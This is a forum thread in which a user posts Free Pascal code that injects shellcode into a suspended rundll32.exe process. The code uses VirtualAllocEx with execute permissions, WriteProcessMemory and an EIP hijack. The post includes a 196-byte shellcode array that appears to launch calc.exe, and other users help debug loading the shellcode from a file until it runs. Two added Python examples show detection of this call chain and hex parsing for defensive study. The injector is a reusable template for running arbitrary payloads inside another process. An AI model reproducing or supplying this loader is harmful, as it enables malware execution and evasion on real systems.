
Author Topic: array of bytes  (Read 5292 times)

fpc2pas

  • New Member
  • *
  • Posts: 34
array of bytes
« on: October 17, 2021, 11:14:02 am »
hey

Wondering why I can't successfully execute injected code in a process, while if using
a const array of byte it works. But when loading the same bytes from a file and converting them back into an array of bytes it doesn't work.

Below is my code.

Code: Pascal

function StrToByte(const Value: String): TByteArr;
var
  I: integer;
begin
  SetLength(Result, Length(Value));
  for I := 0 to Length(Value) - 1 do
  begin
    Result[I] := ord(Value[I + 1]);
  end;
end;


procedure inject_code(shell_content:string);
var
  shell_code : TByteArray;
  shell_content : string;
  pi: TProcessInformation;
  si: TStartupInfo;
  ctx: Context;
  remote_shellcodePtr: Pointer;
  Written:cardinal;
  AppToLaunch: string;

begin

  shell_code :=  StrToByte(shell_content);

  AppToLaunch := 'rundll32.exe';
  UniqueString(AppToLaunch);

  FillMemory( @si, sizeof( si ), 0 );
  FillMemory( @pi, sizeof( pi ), 0 );

  CreateProcess(nil, PChar(AppToLaunch), nil, nil, False,
                CREATE_SUSPENDED,
                nil, nil,  si, pi );

  ctx.ContextFlags := CONTEXT_CONTROL;
  GetThreadContext(pi.hThread,ctx);

  remote_shellcodePtr:=VirtualAllocEx(pi.hProcess,Nil,SizeOf(shell_code),MEM_COMMIT,
    PAGE_EXECUTE_READWRITE);

  WriteProcessMemory(pi.hProcess,remote_shellcodePtr,@shell_code,Sizeof(shell_code),written);

  ctx.Eip:=integer(remote_shellcodePtr);
  ctx.ContextFlags := CONTEXT_CONTROL;
  SetThreadContext(pi.hThread,ctx);
  ResumeThread(pi.hThread);

I have used TStringList to load the following file content
and pass it into
inject_code(list.text), something like that.
Code: Pascal
// here is shell_content loaded as string

So the execution is okay but the code executing is not working, while if I declare the same content as below it works.
Code: Pascal
shell_code:array[0..195] of BYTE = (
  $89,$e5,$83,$ec,$20,$31,$db,$64,$8b,$5b,$30,$8b,
  $5b,$0c,$8b,$5b,$1c,$8b,$1b,$8b,$1b,$8b,$43,$08,
  $89,$45,$fc,$8b,$58,$3c,$01,$c3,$8b,$5b,$78,$01,
  $c3,$8b,$7b,$20,$01,$c7,$89,$7d,$f8,$8b,$4b,$24,
  $01,$c1,$89,$4d,$f4,$8b,$53,$1c,$01,$c2,$89,$55,
  $f0,$8b,$53,$14,$89,$55,$ec,$eb,$32,$31,$c0,$8b,
  $55,$ec,$8b,$7d,$f8,$8b,$75,$18,$31,$c9,$fc,$8b,
  $3c,$87,$03,$7d,$fc,$66,$83,$c1,$08,$f3,$a6,$74,
  $05,$40,$39,$d0,$72,$e4,$8b,$4d,$f4,$8b,$55,$f0,
  $66,$8b,$04,$41,$8b,$04,$82,$03,$45,$fc,$c3,$ba,
  $78,$78,$65,$63,$c1,$ea,$08,$52,$68,$57,$69,$6e,
  $45,$89,$65,$18,$e8,$b8,$ff,$ff,$ff,$31,$c9,$51,
  $68,$2e,$65,$78,$65,$68,$63,$61,$6c,$63,$89,$e3,
  $41,$51,$53,$ff,$d0,$31,$c9,$b9,$01,$65,$73,$73,
  $c1,$e9,$08,$51,$68,$50,$72,$6f,$63,$68,$45,$78,
  $69,$74,$89,$65,$18,$e8,$87,$ff,$ff,$ff,$31,$d2,
  $52,$ff,$d0,$00);

Any solution if I want to import this content from a file or something?
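
The call chain in the post above (a process created with CREATE_SUSPENDED, a PAGE_EXECUTE_READWRITE allocation in it, a remote write, then SetThreadContext and ResumeThread) is a sequence defenders can match in API-call telemetry. The following is an added example, not part of the original post; the event records and their field names are constructed for illustration and follow no real product's schema.

```python
# Added example: match the call chain from the post in API-call telemetry.
# Event records and field names are constructed, not a real EDR schema.
STAGES = ("CreateProcess", "VirtualAllocEx", "WriteProcessMemory",
          "SetThreadContext", "ResumeThread")

def stage_matches(stage, ev):
    """True if ev is the expected call, with the attributes seen in the post."""
    if ev["api"] != stage:
        return False
    if stage == "CreateProcess":
        return "CREATE_SUSPENDED" in ev.get("flags", ())
    if stage == "VirtualAllocEx":
        return ev.get("protect") == "PAGE_EXECUTE_READWRITE"
    return True

def find_suspended_injection(events):
    """Return (caller_pid, target_pid) pairs that ran all five stages in order."""
    progress = {}  # (caller, target) -> index of the next expected stage
    hits = []
    for ev in events:
        key = (ev["pid"], ev["target_pid"])
        idx = progress.get(key, 0)
        if idx < len(STAGES) and stage_matches(STAGES[idx], ev):
            progress[key] = idx + 1
            if idx + 1 == len(STAGES):
                hits.append(key)
    return hits

def event(pid, target, api, **attrs):
    return {"pid": pid, "target_pid": target, "api": api, **attrs}

SAMPLE_EVENTS = [  # constructed telemetry, interleaved across three callers
    # 4100 follows the full chain against its suspended child 4200
    event(4100, 4200, "CreateProcess", flags=("CREATE_SUSPENDED",)),
    event(4100, 4200, "VirtualAllocEx", protect="PAGE_EXECUTE_READWRITE"),
    # 5000 starts a suspended child and only resumes it
    event(5000, 5100, "CreateProcess", flags=("CREATE_SUSPENDED",)),
    event(4100, 4200, "WriteProcessMemory", size=196),
    event(5000, 5100, "ResumeThread"),
    # 6000 writes to read-write memory in a child that was not suspended
    event(6000, 6100, "CreateProcess", flags=()),
    event(6000, 6100, "VirtualAllocEx", protect="PAGE_READWRITE"),
    event(6000, 6100, "WriteProcessMemory", size=64),
    event(4100, 4200, "SetThreadContext"),
    event(4100, 4200, "ResumeThread"),
]

if __name__ == "__main__":
    print(find_suspended_injection(SAMPLE_EVENTS))
```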

dseligo

  • Hero Member
  • *****
  • Posts: 1196
Re: array of bytes
« Reply #1 on: October 17, 2021, 12:46:22 pm »
Code: Pascal
function StrToByte(const Value: String): TByteArr;
var
  I: integer;
begin
  SetLength(Result, Length(Value));
  for I := 0 to Length(Value) - 1 do
  begin
    Result[I] := ord(Value[I + 1]);
  end;
end;

At first glance, I think this function isn't converting correctly.
You have a string with hexadecimal values separated with commas, and in your function you just go one character at a time. You need to take the hexadecimal value (3 characters in your example) and skip commas, new lines, spaces...
After that it would be a good idea to compare the result from this to the array you declared in code, to see if they are the same (just to test the converting function).
« Last Edit: October 17, 2021, 12:48:31 pm by dseligo »
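
The conversion problem described in this reply, as an added example in Python (not code from the thread): `per_char` mirrors the posted `StrToByte`, `parse_hex_list` reads `$hh` tokens while skipping commas and whitespace, and `compare` performs the suggested check against a known-good array. The function names, sample text and byte values are constructed for illustration.

```python
import re

HEX_TOKEN = re.compile(r"\$([0-9A-Fa-f]{2})")
SEPARATORS = ", \t\r\n"

def per_char(text):
    """Mirror of the posted StrToByte: one output byte per input character."""
    return bytes(ord(c) for c in text)

def parse_hex_list(text):
    """Decode '$hh' tokens, skipping separators and rejecting anything else."""
    out = bytearray()
    pos = 0
    while pos < len(text):
        if text[pos] in SEPARATORS:
            pos += 1
            continue
        m = HEX_TOKEN.match(text, pos)
        if m is None:
            raise ValueError(f"unexpected text at offset {pos}: {text[pos:pos + 4]!r}")
        out.append(int(m.group(1), 16))
        pos = m.end()
    return bytes(out)

# Constructed sample in the file format described above, with a line break
# inside the list and trailing whitespace after the last value.
SAMPLE_TEXT = "$de,$ad,$be,\r\n$ef,$00 \r\n"
EXPECTED = bytes([0xDE, 0xAD, 0xBE, 0xEF, 0x00])

def compare(text, expected):
    """For each conversion, return (length, first differing offset or None)."""
    report = {}
    for name, fn in (("per_char", per_char), ("parse_hex_list", parse_hex_list)):
        got = fn(text)
        diff = next((i for i, (a, b) in enumerate(zip(got, expected)) if a != b), None)
        if diff is None and len(got) != len(expected):
            diff = min(len(got), len(expected))
        report[name] = (len(got), diff)
    return report

if __name__ == "__main__":
    print(compare(SAMPLE_TEXT, EXPECTED))
```

Comparing lengths as well as contents matters here: a conversion that keeps separators or trailing whitespace produces an array of a different size even when its leading bytes happen to look plausible.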

Thaddy

  • Hero Member
  • *****
  • Posts: 14205
  • Probably until I exterminate Putin.
Re: array of bytes
« Reply #2 on: October 17, 2021, 01:04:31 pm »
You should not convert at all. When you define an array of byte in code, use a file of byte when saving, not an array of string or char. Yes, you can save and read from binary files in Pascal...
Anyway, code injection is really old school and may get you into more problems when the code is not written to be relocatable, if it is accepted by the OS at all.
« Last Edit: October 17, 2021, 01:13:10 pm by Thaddy »
Specialize a type, not a var.

fpc2pas

  • New Member
  • *
  • Posts: 34
Re: array of bytes
« Reply #3 on: October 18, 2021, 05:57:27 am »
Sorry, but both solutions you provided are not working.

dseligo

  • Hero Member
  • *****
  • Posts: 1196
Re: array of bytes
« Reply #4 on: October 18, 2021, 09:32:46 am »
Sorry, but both solutions you provided are not working.

Did you correct the conversion function?
Did you compare the result against the array you declared in code?

fpc2pas

  • New Member
  • *
  • Posts: 34
Re: array of bytes
« Reply #5 on: October 18, 2021, 11:33:28 am »
I did correct the conversion and did the comparing and it is the same. I have used the following to compare the array results:

Code: Pascal
SetString(str, PAnsiChar(@shell_code[0]), length(shell_code)); // import shellcode
SetString(str1, PAnsiChar(@shellcode1[0]), length(shellcode1)); // shellcode in const value

if ( str = str1 ) then
  writeln('ok');

fpc2pas

  • New Member
  • *
  • Posts: 34
Re: array of bytes
« Reply #6 on: October 18, 2021, 12:07:34 pm »
I think I found the problem: there is some space in the last part of the array. Thanks, it is solved now  ;)

 
